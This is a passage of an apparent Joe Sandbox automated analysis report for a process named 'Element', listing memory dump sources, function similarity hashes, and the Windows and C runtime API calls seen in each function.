                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: NameName::
                    • String ID: `template-parameter$void
                    • API String ID: 1333004437-4057429177
                    • Opcode ID: dec973f20da25776df6c2f943d94ae8085c6cbcf07865b6c80be27cd95f945d5
                    • Instruction ID: 79c6f3333f062ec3232afa699f7243585fbe35f48d929dad600b15d58372e90b
                    • Opcode Fuzzy Hash: dec973f20da25776df6c2f943d94ae8085c6cbcf07865b6c80be27cd95f945d5
                    • Instruction Fuzzy Hash: D6417B36B00B54E8FB01DBA5D8783ED23B1B728788F945116CE086BB59EF78D58AC740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                    • Instruction ID: bba9542d0bd92a7b17b915feb054760d044ad65d6ac3c1e2ea9ce534eb665336
                    • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                    • Instruction Fuzzy Hash: A831C132A097D1CAE7609F24E84476A33A0FB85F91F544239EA9D87B86DF3CD841CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                    • Instruction ID: 62081290961d092161f8002448333922ecb4370feb39c8cd1a1f200e3f0bd5dc
                    • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                    • Instruction Fuzzy Hash: 62F01821A1AA8681EF449F11FC9427963A0EF88F91F485075E99FC6666DF7CDC45C700
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                    • Instruction ID: 5989cfd94ff7918a590bc64b9d7b6643fee54badacefaceb1cfe6c04907a50cd
                    • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                    • Instruction Fuzzy Hash: 81A1D662F0A7A246FF206F609C013B96699EF40FA6F984635DAAD867C5DF3CDC458700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                    • Instruction ID: efd20322be5824f7f6cd94a80f9dcbdbbb00192717a87c8ca99de98737e8d669
                    • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                    • Instruction Fuzzy Hash: 8981CF22A1A66285F7209F299C806BD37A0BB44F56F444935DE8E977D5DF3CEC46C320
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                    • String ID:
                    • API String ID: 3659116390-0
                    • Opcode ID: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                    • Instruction ID: 47accc984356ba5c0a194ca8e1cc95a8534c6dae3da3f9fce6a0810fe5f606e7
                    • Opcode Fuzzy Hash: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                    • Instruction Fuzzy Hash: AE51DF32A15A6189EB10CF65EC543AC7BB0FB84F99F048535DE8A87AD9DF38D942C710
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: shared_ptr$ExclusiveLock$AcquireErrorHandleLastModule$Release
                    • String ID:
                    • API String ID: 2272401952-0
                    • Opcode ID: d5423143b292757ad6b5e2b7c9bb8f3a16e6b7f313ded1b2de9395e14086c294
                    • Instruction ID: 39f547b059f51185af5ca0922adf2c0cc6b4694fea7c72441b962c2938249e4d
                    • Opcode Fuzzy Hash: d5423143b292757ad6b5e2b7c9bb8f3a16e6b7f313ded1b2de9395e14086c294
                    • Instruction Fuzzy Hash: 64516532615684A5EB60E725F8743DAB7E5E3D8780F404635AE8D83BA9EE3CC585CF00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocString
                    • String ID:
                    • API String ID: 262959230-0
                    • Opcode ID: 12b3f27c69990bbef1c792c2cc15a8786e3903b19534a9beeaaf1336ac052df7
                    • Instruction ID: ebfccc009b2aaa6cc392e018b857aaf9b4226bd1960bdb7ff7f9a98b93cf5d9f
                    • Opcode Fuzzy Hash: 12b3f27c69990bbef1c792c2cc15a8786e3903b19534a9beeaaf1336ac052df7
                    • Instruction Fuzzy Hash: 39419F31200744B9FB549F72A57C3E96294E768BA4F184624AE69877D5DF3CD4C38B40
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                    • Instruction ID: 6f13351e5c90698fd367bef8cdf5228ef43bc56301ff76751373d93c15da15da
                    • Opcode Fuzzy Hash: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                    • Instruction Fuzzy Hash: CC51D532A0A79285E720AF219C4057977A8EF44FA2F584235DAEE876D5DF3CDC51C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID:
                    • API String ID: 190572456-0
                    • Opcode ID: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                    • Instruction ID: 81c2fcd195b66614eabc703e0b10940703d1dc44b7cb4496acb10d88093a3162
                    • Opcode Fuzzy Hash: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                    • Instruction Fuzzy Hash: CF418D22B1BAA281FA158F56AC04675A395BF48FA3F494535DD9ECB7D5EF3CE8008300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$Show$Enable
                    • String ID:
                    • API String ID: 2939132127-0
                    • Opcode ID: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                    • Instruction ID: caa2a2d641f86ff94a664c0d81afa30330e87b70e76692d7cd0c3353fd3a6c0c
                    • Opcode Fuzzy Hash: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                    • Instruction Fuzzy Hash: 675160769097C681EBA18F15DC9C27837A4EB84F56F2840B2CA8D87762CF7DE845C750
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                    • Instruction ID: 81ceb2a150270fa7d1998acaa9f20c3fc6f169c4b7716db194511f40877b7a81
                    • Opcode Fuzzy Hash: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                    • Instruction Fuzzy Hash: 1F316B71A197A18AE7919F01AD8433A77A0FB84F92F040175EACAC6662CF7DEC45CB40
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2067211477-0
                    • Opcode ID: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                    • Instruction ID: b8ddb1c283aa11f989f611a00b399193504e2aca71a7360cd2cb405940a48dc9
                    • Opcode Fuzzy Hash: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                    • Instruction Fuzzy Hash: B3216A65A0A79286EE14DF61AC541B9A3A0AF84F92F484431DECD87BD6DF3CEC14C640
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID:
                    • API String ID: 1156100317-0
                    • Opcode ID: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                    • Instruction ID: 17315d192a06c6b0de5de1b4481ac69b5b8433befdbf80eb97cf70abfba27fb7
                    • Opcode Fuzzy Hash: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                    • Instruction Fuzzy Hash: 9111062EE0EA2381F7641928EC533B911416F42B73F094730EAEEC65DADE1CAC818121
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                    • String ID:
                    • API String ID: 2117695475-0
                    • Opcode ID: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                    • Instruction ID: c572318ff072f0d0c98d3ce907bbfcef3f381900bf8555d650fc2b09cd62d397
                    • Opcode Fuzzy Hash: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                    • Instruction Fuzzy Hash: DE11B090E0F16742FA157FB15C162B83285AF50B16F440470E9CDCA5E3ED1CBC404A22
                    APIs
                    • FlsGetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D564CB
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D564EA
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D56512
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D56523
                    • FlsSetValue.KERNEL32(?,?,?,0000021925D4BF93,?,?,00000000,0000021925D4C22E,?,?,?,?,?,0000021925D4C1BA), ref: 0000021925D56534
                    APIs
                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F0774
                    • TerminateThread.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F077F
                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F078D
                    • ~SyncLockT.VCCORLIB ref: 00007FF6C58F0796
                      • Part of subcall function 00007FF6C58EFF10: CloseHandle.KERNEL32(?,?,?,00007FF6C58F079B,?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58EFF21
                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F07A2
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                    • String ID:
                    • API String ID: 3142591903-0
                    • Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                    • Instruction ID: 71663df67f9016b33ad05693fa52e203d0f13f90054c0bc42c40e9b89d70a935
                    • Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                    • Instruction Fuzzy Hash: 00010C36A08A9586E7509F15E84422DB370FB88B52F544131DB8E87B56CF3CD896C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                    • Instruction ID: d2336c5d35246aacaf0a8f78d694cf137299d08571e437a3c56183f8f3ef590d
                    • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                    • Instruction Fuzzy Hash: 7C015261D186D685F6964F11BE883352761AF04F97F184570D4DAC9263DF7EEC48C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ErrorExitLastThread
                    • String ID:
                    • API String ID: 1611280651-0
                    • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                    • Instruction ID: 500c609e217e32f642b3bc9dfc7ac36ff983c42696bcbb537a557a9f80893dd7
                    • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                    • Instruction Fuzzy Hash: 9D011221B09B9292FA146F209D9813C2265FF40F76F545735D6BE866D6DF3CEC588300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                    • API String ID: 3215553584-1196891531
                    • Opcode ID: 7479535b235ddef64746d009f46135dcfb09b8f8046763b9b472e8af934b228b
                    • Instruction ID: f81aa94b521abc35b076fd7cf9da6a96c1cd4dcd7cc75645434f12df04a80d8e
                    • Opcode Fuzzy Hash: 7479535b235ddef64746d009f46135dcfb09b8f8046763b9b472e8af934b228b
                    • Instruction Fuzzy Hash: FE81A2F1684240A9FB754E2CC67C3F96BE2A33A7A8F755415EE06476D6C239C8C39701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                    • API String ID: 3215553584-1196891531
                    • Opcode ID: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                    • Instruction ID: fae339a16db2fba27c593150e879e2069ffc5ae6df2544df44021c4373aaf645
                    • Opcode Fuzzy Hash: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                    • Instruction Fuzzy Hash: ED81C372E0A262C6FB69AF259E4027937A4AF11F46F148035CA8EC76D1EF2DEC51D305
                    APIs
